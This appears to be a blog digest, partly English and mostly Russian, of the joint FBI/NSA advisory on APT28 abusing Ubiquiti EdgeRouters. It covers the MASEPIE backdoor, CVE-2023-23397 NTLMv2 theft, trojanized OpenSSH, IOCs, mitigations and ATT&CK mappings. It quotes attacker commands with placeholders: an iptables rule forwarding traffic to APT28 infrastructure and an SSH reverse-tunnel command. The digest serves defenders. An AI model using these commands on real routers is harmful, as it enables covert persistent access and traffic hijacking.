📌 The‏ ‎recommended ‎actions ‎include‏ ‎resetting ‎hardware‏ ‎to ‎factory ‎settings, ‎updating‏ ‎to‏ ‎the ‎latest‏ ‎firmware, ‎changing‏ ‎default ‎usernames ‎and ‎passwords, ‎and‏ ‎implementing‏ ‎strategic ‎firewall‏ ‎rules.

📌 Network ‎defenders‏ ‎should ‎be ‎aware ‎of ‎the‏ ‎TTPs‏ ‎and‏ ‎IOCs ‎provided‏ ‎in ‎the‏ ‎advisory ‎to‏ ‎detect‏ ‎and ‎respond‏ ‎to ‎potential ‎compromises.

The ‎FBI,‏ ‎NSA, ‎and ‎their ‎international ‎pals‏ ‎have ‎graced‏ ‎us‏ ‎with ‎yet ‎another‏ ‎Cybersecurity ‎Advisory‏ ‎(CSA), ‎this ‎time ‎starring‏ ‎the‏ ‎ever-so-popular ‎Ubiquiti‏ ‎EdgeRouters ‎and‏ ‎their ‎starring ‎role ‎in ‎the‏ ‎global‏ ‎cybercrime ‎drama‏ ‎directed ‎by‏ ‎none ‎other ‎than ‎APT28.

In ‎this‏ ‎latest‏ ‎blockbuster‏ ‎release ‎from‏ ‎our ‎cybersecurity‏ ‎overlords, ‎we‏ ‎learn‏ ‎how ‎Ubiquiti‏ ‎EdgeRouters, ‎those ‎user-friendly, ‎Linux-based ‎gadgets,‏ ‎have ‎become‏ ‎the‏ ‎unwilling ‎accomplices ‎in‏ ‎APT28's ‎nefarious‏ ‎schemes. ‎With ‎their ‎default‏ ‎credentials‏ ‎and ‎«what‏ ‎firewall?» ‎security,‏ ‎these ‎routers ‎are ‎practically ‎rolling‏ ‎out‏ ‎the ‎red‏ ‎carpet ‎for‏ ‎cyber ‎villains.

If ‎you’re ‎using ‎Ubiquiti‏ ‎EdgeRouters‏ ‎and‏ ‎haven’t ‎been‏ ‎hacked ‎yet,‏ ‎congratulations! ‎But‏ ‎maybe‏ ‎check ‎those‏ ‎settings, ‎update ‎that ‎firmware, ‎and‏ ‎change ‎those‏ ‎passwords.‏ ‎Or ‎better ‎yet,‏ ‎just ‎send‏ ‎your ‎router ‎on ‎a‏ ‎nice‏ ‎vacation ‎to‏ ‎a ‎place‏ ‎where ‎APT28 ‎can’t ‎find ‎it.‏ ‎Happy‏ ‎securing!

-------

This ‎document‏ ‎provides ‎a‏ ‎comprehensive ‎analysis ‎of ‎the ‎joint‏ ‎Cybersecurity‏ ‎Advisory‏ ‎(CSA) ‎released‏ ‎by ‎the‏ ‎Federal ‎Bureau‏ ‎of‏ ‎Investigation ‎(FBI),‏ ‎National ‎Security ‎Agency ‎(NSA), ‎US‏ ‎Cyber ‎Command,‏ ‎and‏ ‎international ‎partners, ‎detailing‏ ‎the ‎exploitation‏ ‎of ‎compromised ‎Ubiquiti ‎EdgeRouters‏ ‎by‏ ‎APT28 ‎to‏ ‎facilitate ‎malicious‏ ‎cyber ‎operations ‎globally. ‎The ‎analysis‏ ‎delves‏ ‎into ‎various‏ ‎aspects ‎of‏ ‎the ‎advisory, ‎including ‎the ‎tactics,‏ ‎techniques,‏ ‎and‏ ‎procedures ‎(TTPs)‏ ‎employed ‎by‏ ‎the ‎threat‏ ‎actors,‏ ‎indicators ‎of‏ ‎compromise ‎(IOCs), ‎and ‎recommended ‎mitigation‏ ‎strategies ‎for‏ ‎network‏ ‎defenders ‎and ‎EdgeRouter‏ ‎users.

This ‎qualitative‏ ‎summary ‎of ‎the ‎CSA‏ ‎provides‏ ‎valuable ‎insights‏ ‎for ‎cybersecurity‏ ‎professionals, ‎network ‎defenders, ‎and ‎specialists‏ ‎across‏ ‎various ‎sectors,‏ ‎offering ‎a‏ ‎deeper ‎understanding ‎of ‎the ‎nature‏ ‎of‏ ‎state-sponsored‏ ‎cyber ‎threats‏ ‎and ‎practical‏ ‎guidance ‎on‏ ‎enhancing‏ ‎network ‎security‏ ‎against ‎sophisticated ‎adversaries. ‎The ‎analysis‏ ‎is ‎particularly‏ ‎useful‏ ‎for ‎those ‎involved‏ ‎in ‎securing‏ ‎critical ‎infrastructure, ‎as ‎it‏ ‎highlights‏ ‎the ‎evolving‏ ‎tactics ‎of‏ ‎cyber ‎threat ‎actors ‎and ‎underscores‏ ‎the‏ ‎importance

Unpacking ‎in‏ ‎more ‎detail

NSA's panic. Ubiquiti [EN].pdf

438,03 KB

Скачать

В ‎декабре‏ ‎2023 ‎года ‎APT28 ‎разработали ‎MASEPIE,‏ ‎небольшой ‎бэкдор‏ ‎на‏ ‎Python, ‎способный ‎выполнять‏ ‎произвольные ‎команды‏ ‎на ‎машинах-жертвах. ‎Расследование ‎ФБР‏ ‎показало,‏ ‎что ‎скомпрометированные‏ ‎Ubiquiti ‎EdgeRouters‏ ‎были ‎использованы ‎в ‎качестве ‎C2-инфраструктуры‏ ‎для‏ ‎бэкдоров ‎MASEPIE.

C2‏ ‎инфраструктура

Хотя ‎APT28‏ ‎не ‎развёртывает ‎MASEPIE ‎на ‎самих‏ ‎EdgeRouters,‏ ‎скомпрометированные‏ ‎маршрутизаторы ‎использовались‏ ‎в ‎качестве‏ ‎инфраструктуры ‎C2‏ ‎для‏ ‎связи ‎с‏ ‎бэкдорами ‎MASEPIE ‎и ‎контроля ‎над‏ ‎ними, ‎установленными‏ ‎в‏ ‎системах, ‎принадлежащих ‎целевым‏ ‎лицам ‎и‏ ‎организациям.

Данные, ‎отправляемые ‎на ‎EdgeRouters,‏ ‎действующие‏ ‎как ‎серверы‏ ‎C2, ‎были‏ ‎зашифрованы ‎с ‎использованием ‎случайно ‎сгенерированного‏ ‎16-символьного‏ ‎ключа ‎AES,‏ ‎для ‎затруднения‏ ‎обнаружения ‎и ‎анализа ‎трафика.

Функциональность ‎бэкдора‏ ‎MASEPIE

MASEPIE‏ ‎—‏ ‎это ‎бэкдор‏ ‎на ‎основе‏ ‎Python, ‎который‏ ‎позволяет‏ ‎выполнять ‎произвольные‏ ‎команды ‎в ‎заражённых ‎системах. ‎Этот‏ ‎бэкдор ‎предоставляет‏ ‎возможности‏ ‎удалённого ‎управления ‎для‏ ‎выполнения ‎действий:

📌 эксфильтрация‏ ‎данных

📌 распространение ‎внутри ‎скомпрометированной ‎сети

📌 развёртывание‏ ‎дополнительных‏ ‎вредоносных ‎программ‏ ‎или ‎инструментов

📌 выполнение‏ ‎команд ‎разведки ‎и ‎сбора ‎разведданных

Смягчение‏ ‎последствий‏ ‎

Чтобы ‎снизить‏ ‎риск ‎появления‏ ‎бэкдоров ‎MASEPIE ‎и ‎использования ‎скомпрометированных‏ ‎EdgeRouters‏ ‎в‏ ‎качестве ‎C2-инфраструктуры,‏ ‎следует ‎предпринять‏ ‎следующие ‎шаги:

📌 Внедрение‏ ‎защиты‏ ‎конечных ‎устройств:‏ ‎развёртывание ‎решений ‎для ‎защиты ‎конечных‏ ‎устройств, ‎способных‏ ‎обнаруживать‏ ‎и ‎предотвращать ‎выполнение‏ ‎MASEPIE ‎и‏ ‎других ‎вредоносных ‎скриптов ‎Python‏ ‎или‏ ‎бэкдоров.

📌 Мониторинг ‎сетевого‏ ‎трафика: отслеживание ‎сетевого‏ ‎трафика ‎на ‎предмет ‎любых ‎подозрительных‏ ‎зашифрованных‏ ‎сообщений ‎или‏ ‎подключений ‎к‏ ‎известной ‎инфраструктуре, ‎включая ‎скомпрометированные ‎EdgeRouters.

📌 Анализ‏ ‎сетевых‏ ‎журналов: просмотр‏ ‎сетевых ‎журналов‏ ‎на ‎предмет‏ ‎признаков ‎зашифрованных‏ ‎сообщений‏ ‎или ‎подключений‏ ‎к ‎EdgeRouters, ‎которые ‎могут ‎действовать‏ ‎как ‎серверы‏ ‎C2.

Прокси-сервер ‎и‏ ‎туннельная ‎инфраструктура

APT28 ‎использовали ‎скомпрометированные ‎Ubiquiti‏ ‎EdgeRouters ‎для‏ ‎установления‏ ‎прокси-соединений ‎и ‎SSH-туннелей‏ ‎к ‎подконтрольной‏ ‎инфраструктуре ‎для ‎поддержания ‎постоянного‏ ‎доступа‏ ‎и ‎контроля‏ ‎над ‎скомпрометированными‏ ‎устройствами ‎даже ‎после ‎смены ‎пароля‏ ‎или‏ ‎других ‎попыток‏ ‎взлома.

Reverse ‎proxy-подключения

Были‏ ‎использованы ‎правила ‎iptables ‎в ‎EdgeRouters‏ ‎для‏ ‎установления‏ ‎подключений, ‎например:

iptables‏ ‎-t ‎nat‏ ‎-I ‎PREROUTING‏ ‎-d‏ ‎<router ‎IP‏ ‎address> ‎-p ‎tcp ‎-m ‎tcp‏ ‎--dport ‎4443‏ ‎-j‏ ‎DNAT ‎-to-destination ‎<APT28‏ ‎dedicated ‎infrastructure>:‏ ‎10081

Это ‎правило ‎iptables ‎перенаправляет‏ ‎входящий‏ ‎трафик ‎через‏ ‎порт ‎4443‏ ‎EdgeRouter ‎в ‎выделенную ‎инфраструктуру ‎на‏ ‎порту‏ ‎10081.

Reverse ‎SSH-туннели

Кроме‏ ‎того, ‎APT28‏ ‎загрузили ‎контролируемые ‎SSH-RSA-ключи ‎на ‎скомпрометированные‏ ‎EdgeRouters‏ ‎для‏ ‎создания ‎SSH-туннелей.‏ ‎Эти ‎туннели‏ ‎позволяют ‎получать‏ ‎доступ‏ ‎к ‎скомпрометированным‏ ‎устройствам ‎даже ‎после ‎смены ‎пароля‏ ‎или ‎других‏ ‎попыток‏ ‎взлома.

Следующие ‎каталоги ‎необходимо‏ ‎просмотреть ‎на‏ ‎предмет ‎неизвестных ‎ключей ‎RSA:

/root/.ssh/

/home/<user>/.ssh/

Наличие‏ ‎неизвестных‏ ‎ключей ‎RSA‏ ‎в ‎этих‏ ‎каталогах ‎может ‎указывать ‎на ‎то,‏ ‎что‏ ‎их ‎использовали‏ ‎для ‎доступа‏ ‎к ‎EdgeRouters ‎в ‎обход ‎аутентификации‏ ‎по‏ ‎паролю.

Кроме‏ ‎того, ‎безопасники‏ ‎могут ‎проверить‏ ‎журналы ‎сетевого‏ ‎трафика‏ ‎на ‎EdgeRouters‏ ‎для ‎идентификации ‎аномальные ‎сеансы ‎SSH:

ssh‏ ‎–i ‎<RSA‏ ‎key>‏ ‎-p ‎<port> ‎root@<router‏ ‎IP ‎address>‏ ‎-R ‎<router ‎IP ‎address>:<port>

Эта‏ ‎команда‏ ‎устанавливает ‎SSH-туннель‏ ‎от ‎EdgeRouter‏ ‎к ‎инфраструктуре, ‎позволяя ‎поддерживать ‎удалённый‏ ‎доступ‏ ‎и ‎контроль‏ ‎над ‎скомпрометированным‏ ‎устройством.

APT28 ‎использовали‏ ‎CVE-2023–23397, ‎уязвимость ‎с ‎критическим ‎повышением‏ ‎привилегий ‎в‏ ‎Microsoft‏ ‎Outlook ‎в ‎Windows,‏ ‎для ‎облегчения‏ ‎утечки ‎учётных ‎данных ‎NTLMv2.‏ ‎Эта‏ ‎0day-уязвимость ‎позволяет‏ ‎передавать ‎хэши‏ ‎Net-NTLMv2 ‎в ‎подконтрольную ‎инфраструктуру.

Для ‎использования‏ ‎CVE-2023–23397‏ ‎и ‎сбора‏ ‎учётных ‎данных‏ ‎NTLMv2 ‎использованы ‎два ‎общедоступных ‎инструмента:

📌 http://ntlmrelayx.py: инструмент‏ ‎является‏ ‎частью‏ ‎Impacket ‎suite,‏ ‎набора ‎классов‏ ‎Python ‎для‏ ‎работы‏ ‎с ‎сетевыми‏ ‎протоколами. ‎APT28 ‎использовали ‎http://ntlmrelayx.py для ‎выполнения‏ ‎relay-атак ‎NTLM‏ ‎[T1557]‏ ‎и ‎облегчения ‎утечки‏ ‎учётных ‎данных‏ ‎NTLMv2.

📌 Responder: ‎инструмент, ‎предназначенный ‎для‏ ‎сбора‏ ‎и ‎передачи‏ ‎хэшей ‎NTLMv2‏ ‎путём ‎настройки ‎подконтрольного ‎сервера ‎аутентификации‏ ‎[T1556]‏ ‎для ‎сбора‏ ‎учётных ‎данных‏ ‎NTLMv2 ‎от ‎целевых ‎учётных ‎записей‏ ‎Outlook.

Безопасники‏ ‎могут‏ ‎выполнять ‎поиск‏ ‎файлов ‎журналов,‏ ‎а ‎также‏ ‎наличия‏ ‎http://ntlmrelayx.py и ‎Responder.db,‏ ‎Responder-Session.log ‎для ‎выявления ‎потенциальной ‎активности,‏ ‎связанной ‎с‏ ‎эксплуатацией‏ ‎CVE-2023–23397.

Смягчение ‎последствий

Чтобы ‎снизить‏ ‎риск ‎использования‏ ‎CVE-2023–23397 ‎и ‎утечки ‎учётных‏ ‎данных‏ ‎NTLMv2 ‎следует‏ ‎предпринять ‎следующие‏ ‎шаги:

📌 Применение ‎исправления ‎Microsoft: ‎Microsoft ‎выпустила‏ ‎исправление‏ ‎для ‎CVE-2023–23397.

📌 Проверка‏ ‎на ‎наличие‏ ‎скомпрометированных ‎EdgeRouters: ‎необходимо ‎использовать ‎предоставленную‏ ‎информацию‏ ‎для‏ ‎проверки ‎EdgeRouters‏ ‎на ‎наличие‏ ‎http://ntlmrelayx.py, связанных ‎с‏ ‎ними‏ ‎файлов ‎журналов,‏ ‎провести ‎идентификацию ‎и ‎изоляцию ‎всех‏ ‎скомпрометированных ‎маршрутизаторов‏ ‎для‏ ‎дальнейшего ‎расследования.

📌 Сброс ‎скомпрометированных‏ ‎учётных ‎данных: при‏ ‎обнаружении ‎утечки ‎учётных ‎данных‏ ‎NTLMv2‏ ‎следует ‎сбросить‏ ‎соответствующие ‎учётные‏ ‎записи ‎пользователей ‎и ‎применить ‎дополнительные‏ ‎меры‏ ‎безопасности, ‎такие‏ ‎как ‎MFA.

📌 Применение‏ ‎рекомендуемых ‎мер ‎по ‎устранению ‎неполадок:‏ ‎меры‏ ‎по‏ ‎устранению ‎включают‏ ‎сброс ‎настроек‏ ‎оборудования ‎к‏ ‎заводским‏ ‎настройкам, ‎обновление‏ ‎до ‎последней ‎версии ‎встроенного ‎ПО‏ ‎и ‎изменение‏ ‎имён‏ ‎пользователей ‎и ‎паролей‏ ‎по ‎умолчанию.

APT28 ‎размещали‏ ‎скрипты ‎Python ‎на ‎скомпрометированных ‎Ubiquiti‏ ‎EdgeRouters ‎для‏ ‎сбора‏ ‎и ‎проверки ‎украденных‏ ‎учётных ‎данных‏ ‎учётной ‎записи ‎веб-почты. ‎Эти‏ ‎сценарии‏ ‎обычно ‎хранятся‏ ‎вместе ‎со‏ ‎связанными ‎файлами ‎журналов ‎в ‎домашнем‏ ‎каталоге‏ ‎скомпрометированного ‎пользователя,‏ ‎например:

📌 /home/<compromised ‎user>/srv/http://core.py

📌 /home/<compromised‏ ‎user>/srv/debug.txt

ФБР ‎заявило ‎о ‎восстановлении ‎подробных‏ ‎файлов‏ ‎журналов,‏ ‎содержащие ‎информацию‏ ‎об ‎активности‏ ‎APT28 ‎на‏ ‎скомпрометированных‏ ‎EdgeRouters.

Пользовательские ‎скрипты‏ ‎на ‎Python

📌 Размещённые ‎крипты ‎Python ‎служат‏ ‎для ‎сбора‏ ‎и‏ ‎проверки ‎украденных ‎данных‏ ‎учётной ‎записи‏ ‎веб-почты. ‎APT28 ‎используют ‎эти‏ ‎скрипты‏ ‎как ‎часть‏ ‎своих ‎операций‏ ‎сбора ‎учётных ‎данных, ‎нацеленных ‎на‏ ‎конкретных‏ ‎пользователей ‎веб-почты.

📌 Скрипты‏ ‎предназначены ‎для‏ ‎автоматического ‎устранения ‎проблем ‎с ‎капчей‏ ‎на‏ ‎страницах‏ ‎входа ‎в‏ ‎веб-почту, ‎позволяя‏ ‎атакующим ‎обойти‏ ‎эту‏ ‎меру ‎безопасности‏ ‎и ‎получить ‎несанкционированный ‎доступ ‎к‏ ‎целевым ‎учётным‏ ‎записям.‏ ‎Чтобы ‎достичь ‎этого,‏ ‎скрипты ‎устанавливают‏ ‎соединения ‎с ‎API ‎endpoint‏ ‎api[.]anti-captcha[.]com,‏ ‎который ‎используется‏ ‎APT28 ‎для‏ ‎решения ‎проблем ‎с ‎капчей.

Yara-правила ‎для‏ ‎обнаружения

📌 Чтобы‏ ‎помочь ‎найти‏ ‎скрипты ‎сбора‏ ‎учётных ‎данных ‎на ‎скомпрометированных ‎EdgeRouters,‏ ‎ФБР‏ ‎разработало‏ ‎правило ‎Yara.‏ ‎Yara ‎—‏ ‎это ‎инструмент,‏ ‎используемый‏ ‎для ‎идентификации‏ ‎и ‎классификации ‎вредоносных ‎программ ‎на‏ ‎основе ‎текстовых‏ ‎или‏ ‎двоичных ‎шаблонов. ‎Предоставленное‏ ‎ФБР ‎правило‏ ‎Yara ‎можно ‎использовать ‎для‏ ‎сканирования‏ ‎файловой ‎системы‏ ‎EdgeRouters ‎и‏ ‎обнаружения ‎присутствия ‎скриптов ‎Python.

📌 Помимо ‎использования‏ ‎правила‏ ‎Yara, ‎можно‏ ‎также ‎запрашивать‏ ‎сетевой ‎трафик ‎на ‎предмет ‎подключений‏ ‎к‏ ‎api[.]anti-captcha[.]com‏ ‎endpoint. ‎Обнаружение‏ ‎трафика, ‎направленного‏ ‎к ‎этому‏ ‎API,‏ ‎может ‎помочь‏ ‎выявить ‎скомпрометированные ‎EdgeRouters ‎и ‎потенциальные‏ ‎действия ‎по‏ ‎сбору‏ ‎учётных ‎данных.

Смягчение ‎последствий

📌 При‏ ‎обнаружении ‎наличия‏ ‎скриптов ‎или ‎подключений ‎к‏ ‎api[.]anti-captcha[.]com‏ ‎endpoint ‎сетевые‏ ‎необходимо ‎предпринять‏ ‎немедленные ‎действия ‎для ‎снижения ‎риска‏ ‎и‏ ‎исследовать ‎степень‏ ‎компрометации. ‎Изоляция‏ ‎затронутых ‎маршрутизаторов ‎Edge ‎от ‎сети

📌 Выполнение‏ ‎тщательного‏ ‎анализа‏ ‎сценариев ‎и‏ ‎файлов ‎журналов‏ ‎для ‎понимания‏ ‎объема‏ ‎операций ‎по‏ ‎сбору ‎учётных ‎данных

📌 Сброс ‎паролей ‎для‏ ‎потенциально ‎скомпрометированных‏ ‎учётных‏ ‎записей ‎веб-почты

APT28 ‎использовали‏ ‎учётные ‎данные ‎по ‎умолчанию ‎и‏ ‎троянизированные ‎серверные‏ ‎процессы‏ ‎OpenSSH ‎для ‎доступа‏ ‎к ‎Ubiquiti‏ ‎EdgeRouters, ‎связанеые ‎с ‎Moobot,‏ ‎ботнетом‏ ‎на ‎базе‏ ‎Mirai, ‎который‏ ‎заражает ‎устройства ‎Интернета ‎вещей ‎(IoT)‏ ‎с‏ ‎использованием ‎уязвимостей,‏ ‎которые ‎можно‏ ‎использовать ‎удалённо, ‎таких ‎как ‎слабые‏ ‎пароли‏ ‎или‏ ‎пароли ‎по‏ ‎умолчанию.

Троянские ‎файлы‏ ‎OpenSSH-сервера

Троянские ‎бинарные‏ ‎OpenSSH,‏ ‎загруженные ‎с‏ ‎packinstall[.]kozow ‎[.]com, ‎заменили ‎оригинальные ‎бинарные‏ ‎файлы ‎на‏ ‎EdgeRouters‏ ‎с ‎целью ‎удалённо‏ ‎обходить ‎аутентификацию‏ ‎и ‎получать ‎несанкционированный ‎доступ‏ ‎к‏ ‎скомпрометированным ‎маршрутизаторам.

Ботнет‏ ‎Moobot ‎известен‏ ‎своей ‎способностью ‎использовать ‎уязвимости ‎в‏ ‎устройствах‏ ‎Интернета ‎вещей,‏ ‎особенно ‎с‏ ‎ненадёжными ‎паролями ‎или ‎паролями ‎по‏ ‎умолчанию.‏ ‎Заменяя‏ ‎законные ‎двоичные‏ ‎файлы ‎сервера‏ ‎OpenSSH ‎троянскими‏ ‎версиями,‏ ‎APT28 ‎могут‏ ‎поддерживать ‎постоянный ‎доступ ‎к ‎скомпрометированным‏ ‎EdgeRouters ‎и‏ ‎использовать‏ ‎их ‎в ‎различных‏ ‎вредоносных ‎целях.

Ботнет‏ ‎на ‎базе ‎Mirai

Moobot ‎—‏ ‎это‏ ‎ботнет ‎на‏ ‎базе ‎Mirai‏ ‎и ‎является ‎производным ‎от ‎Mirai,‏ ‎которая‏ ‎впервые ‎появилась‏ ‎в ‎2016‏ ‎году. ‎Mirai ‎был ‎предназначен ‎для‏ ‎сканирования‏ ‎и‏ ‎заражения ‎IoT-устройств‏ ‎путём ‎использования‏ ‎распространённых ‎уязвимостей‏ ‎и‏ ‎учётных ‎данных‏ ‎по ‎умолчанию. ‎Как ‎только ‎устройство‏ ‎заражено, ‎оно‏ ‎становится‏ ‎частью ‎ботнета ‎и‏ ‎может ‎использоваться‏ ‎для ‎распределённых ‎атак ‎типа‏ ‎«отказ‏ ‎в ‎обслуживании»‏ ‎(DDoS), ‎credential‏ ‎stuffing ‎и ‎других ‎вредоносных ‎действий.

Воздействие‏ ‎на‏ ‎маршрутизаторы ‎EdgeRouters

При‏ ‎наличии ‎троянизированных‏ ‎процессов ‎OpenSSH ‎APT28 ‎могут ‎поддерживать‏ ‎постоянный‏ ‎доступ‏ ‎к ‎скомпрометированным‏ ‎маршрутизаторы ‎и‏ ‎использовать ‎их‏ ‎в‏ ‎качестве ‎платформы‏ ‎для ‎вредоносных ‎действий:

📌 Сбор ‎учётных ‎данных

📌 Сбор‏ ‎NTLMv2

📌 Проксирование ‎сетевого‏ ‎трафика

📌 Размещение‏ ‎целевых ‎страниц ‎для‏ ‎защиты ‎от‏ ‎фишинга ‎и ‎пользовательских ‎инструментов

Операции ‎были‏ ‎нацелены ‎на ‎различные ‎отрасли, ‎включая‏ ‎аэрокосмическую ‎и‏ ‎оборонную,‏ ‎образование, ‎энергетику ‎и‏ ‎коммунальные ‎услуги,‏ ‎госсектор, ‎гостиничный ‎бизнес, ‎нефть‏ ‎и‏ ‎газ, ‎розничную‏ ‎торговлю, ‎технологии‏ ‎и ‎транспорт. ‎Целевые ‎страны ‎включают‏ ‎Чешскую‏ ‎Республику, ‎Италию,‏ ‎Литву, ‎Иорданию,‏ ‎Черногорию, ‎Польшу, ‎Словакию, ‎Турцию, ‎Объединённые‏ ‎Арабские‏ ‎Эмираты‏ ‎и ‎США

Потенциальные‏ ‎последствия ‎воздействия‏ ‎включают:

📌 Утечка ‎данных‏ ‎и‏ ‎кража ‎конфиденциальной‏ ‎информации, ‎интеллектуальной ‎собственности ‎или ‎коммерческой‏ ‎тайны.

📌 Нарушение ‎работы‏ ‎критически‏ ‎важных ‎объектов ‎инфраструктуры,‏ ‎таких ‎как‏ ‎электросети, ‎транспортные ‎системы ‎или‏ ‎производственные‏ ‎процессы.

📌 Компрометация ‎правительственных‏ ‎сетей ‎и‏ ‎систем, ‎потенциально ‎ведущая ‎к ‎шпионажу‏ ‎или‏ ‎угрозам ‎национальной‏ ‎безопасности.

📌 Финансовые ‎потери‏ ‎из-за ‎сбоев ‎в ‎работе, ‎кражи‏ ‎данных‏ ‎клиентов‏ ‎или ‎ущерба‏ ‎репутации.

📌 Потенциальные ‎риски‏ ‎для ‎безопасности‏ ‎в‏ ‎случае ‎взлома‏ ‎систем ‎управления ‎или ‎сетей ‎операционных‏ ‎технологий ‎(OT).

📌 Потеря‏ ‎доверия‏ ‎клиентов ‎и ‎доверия‏ ‎к ‎пострадавшим‏ ‎организациям.

TTPs ‎MITRE ‎ATT& ‎CK‏ ‎

Разработка:

📌 T1587‏ ‎(разработка): ‎создание‏ ‎пользовательских ‎Py-скриптов‏ ‎для ‎сбора ‎учётных ‎данных ‎в‏ ‎т.ч‏ ‎веб-почты.

📌 T1588 ‎(возможности‏ ‎получения): доступ ‎к‏ ‎EdgeRouters, ‎скомпрометированным ‎ботнетом ‎Moobot, ‎который‏ ‎устанавливает‏ ‎троянские‏ ‎программы ‎OpenSSH.

Первоначальный‏ ‎доступ:

📌 T1584 ‎(скомпрометированная‏ ‎инфраструктура): ‎доступ‏ ‎к‏ ‎EdgeRouters, ‎ранее‏ ‎скомпрометированным ‎троянцем ‎OpenSSH.

📌 T1566 ‎(фишинг): межсайтовые ‎скриптовые‏ ‎кампании ‎и‏ ‎фишинговые‏ ‎кампании ‎«браузер ‎в‏ ‎браузере».

Выполнение:

📌 T1203 ‎(Использование‏ ‎для ‎выполнения ‎клиентом): ‎использование‏ ‎уязвимости‏ ‎CVE-2023-23397.

Закрепление:

📌 T1546 ‎(выполнение,‏ ‎инициируемое ‎событием):‏ ‎На ‎скомпрометированных ‎маршрутизаторах ‎были ‎размещены‏ ‎скрипты‏ ‎Bash ‎и‏ ‎двоичные ‎файлы‏ ‎ELF, ‎предназначенные ‎для ‎бэкдора ‎демонов‏ ‎OpenSSH‏ ‎и‏ ‎связанных ‎с‏ ‎ними ‎служб.

Доступ‏ ‎с ‎учётными‏ ‎данными:

📌 T1557‏ ‎(Злоумышленник ‎посередине):‏ ‎инструменты ‎Impacket ‎http://ntlmrelayx.py и ‎Responder, ‎на‏ ‎скомпрометированные ‎маршрутизаторы‏ ‎для‏ ‎выполнения ‎ретрансляционных ‎атак‏ ‎NTLM.

📌 T1556 ‎(Изменение‏ ‎процесса ‎аутентификации): поддельные ‎серверы ‎аутентификации-NTLMv2‏ ‎для‏ ‎изменения ‎процесса‏ ‎аутентификации ‎с‏ ‎использованием ‎и ‎передачей ‎украденных ‎учётных‏ ‎данных.

Сбор‏ ‎данных:

📌 T1119 ‎(автоматический‏ ‎сбор): ‎APT28‏ ‎использовал ‎CVE-2023-23397 ‎для ‎автоматизации ‎сбора‏ ‎хэшей‏ ‎NTLMv2.

Эксфильтрация‏ ‎данных:

📌 T1020 ‎(автоматизированная‏ ‎эксфильтрация): ‎использование‏ ‎CVE-2023-23397 ‎для‏ ‎автоматизации‏ ‎эксфильтрации ‎данных‏ ‎в ‎подконтрольную ‎инфраструктуру.

Документ ‎под‏ ‎названием ‎«Cyber ‎Actors ‎Use ‎Compromised‏ ‎Routers ‎to‏ ‎Facilitate‏ ‎Cyber ‎Operations», ‎опубликованный‏ ‎ФБР, ‎АНБ,‏ ‎киберкомандованием ‎США ‎и ‎международными‏ ‎партнёрами‏ ‎предупреждает ‎об‏ ‎использовании ‎скомпрометированных‏ ‎маршрутизаторов ‎Ubiquiti ‎EdgeRouters ‎для ‎облегчения‏ ‎вредоносных‏ ‎киберопераций ‎по‏ ‎всему ‎миру.

Популярность‏ ‎Ubiquiti ‎EdgeRouters ‎объясняется ‎удобной ‎в‏ ‎использовании‏ ‎ОС‏ ‎на ‎базе‏ ‎Linux, ‎учётными‏ ‎данными ‎по‏ ‎умолчанию‏ ‎и ‎ограниченной‏ ‎защитой ‎брандмауэром. ‎Маршрутизаторы ‎часто ‎поставляются‏ ‎с ‎небезопасными‏ ‎конфигурациями‏ ‎по ‎умолчанию ‎и‏ ‎не ‎обновляют‏ ‎прошивку ‎автоматически.

Скомпрометированные ‎EdgeRouters ‎использовались‏ ‎APT28‏ ‎для ‎сбора‏ ‎учётных ‎данных,‏ ‎NTLMv2, ‎сетевого ‎трафика ‎прокси-сервера ‎и‏ ‎размещения‏ ‎целевых ‎страниц‏ ‎для ‎фишинга‏ ‎и ‎пользовательских ‎инструментов. ‎APT28 ‎получила‏ ‎доступ‏ ‎к‏ ‎маршрутизаторам, ‎используя‏ ‎учётные ‎данные‏ ‎по ‎умолчанию,‏ ‎и‏ ‎троянизировала ‎серверные‏ ‎процессы ‎OpenSSH. ‎Наличие ‎root-доступ ‎к‏ ‎скомпрометированным ‎маршрутизаторам,‏ ‎дало‏ ‎доступ ‎к ‎ОС‏ ‎для ‎установки‏ ‎инструментов ‎и ‎сокрытия ‎своей‏ ‎личности.

APT28‏ ‎также ‎развернула‏ ‎пользовательские ‎скрипты‏ ‎Python ‎на ‎скомпрометированных ‎маршрутизаторах ‎для‏ ‎сбора‏ ‎и ‎проверки‏ ‎украденных ‎данных‏ ‎учётной ‎записи ‎веб-почты, ‎полученных ‎с‏ ‎помощью‏ ‎межсайтовых‏ ‎скриптов ‎и‏ ‎кампаний ‎фишинга‏ ‎«браузер ‎в‏ ‎браузере».‏ ‎Кроме ‎того,‏ ‎они ‎использовали ‎критическую ‎уязвимость ‎с‏ ‎повышением ‎привилегий‏ ‎на‏ ‎нулевой ‎день ‎в‏ ‎Microsoft ‎Outlook‏ ‎(CVE-2023–23397) ‎для ‎сбора ‎данных‏ ‎NTLMv2‏ ‎из ‎целевых‏ ‎учётных ‎записей‏ ‎Outlook ‎и ‎общедоступные ‎инструменты ‎для‏ ‎оказания‏ ‎помощи ‎в‏ ‎NTLM-атаках

Ключевые ‎моменты

📌 APT28‏ ‎(известные ‎как ‎Fancy ‎Bear, ‎Forest‏ ‎Blizzard‏ ‎и‏ ‎Strontium) ‎использовали‏ ‎скомпрометированные ‎серверы‏ ‎Ubiquiti ‎EdgeRouters‏ ‎для‏ ‎проведения ‎вредоносных‏ ‎киберопераций ‎по ‎всему ‎миру.

📌 Эксплуатация ‎включает‏ ‎сбор ‎учётных‏ ‎данных,‏ ‎сбор ‎дайджестов ‎NTLMv2,‏ ‎проксирование ‎сетевого‏ ‎трафика, ‎а ‎также ‎размещение‏ ‎целевых‏ ‎страниц ‎для‏ ‎фишинга ‎и‏ ‎пользовательских ‎инструментов.

📌 ФБР, ‎АНБ, ‎киберкомандование ‎США‏ ‎и‏ ‎международные ‎партнеры‏ ‎выпустили ‎совместное‏ ‎консультативное ‎заключение ‎по ‎кибербезопасности ‎(CSA)‏ ‎с‏ ‎подробным‏ ‎описанием ‎угрозы‏ ‎и ‎рекомендациями‏ ‎по ‎ее‏ ‎устранению.

📌 Рекомендации‏ ‎включают ‎наблюдаемые‏ ‎тактики, ‎методы ‎и ‎процедуры ‎(TTP),‏ ‎индикаторы ‎компрометации‏ ‎(IoC)‏ ‎для ‎сопоставления ‎с‏ ‎системой ‎MITRE‏ ‎ATT& ‎CK ‎framework.

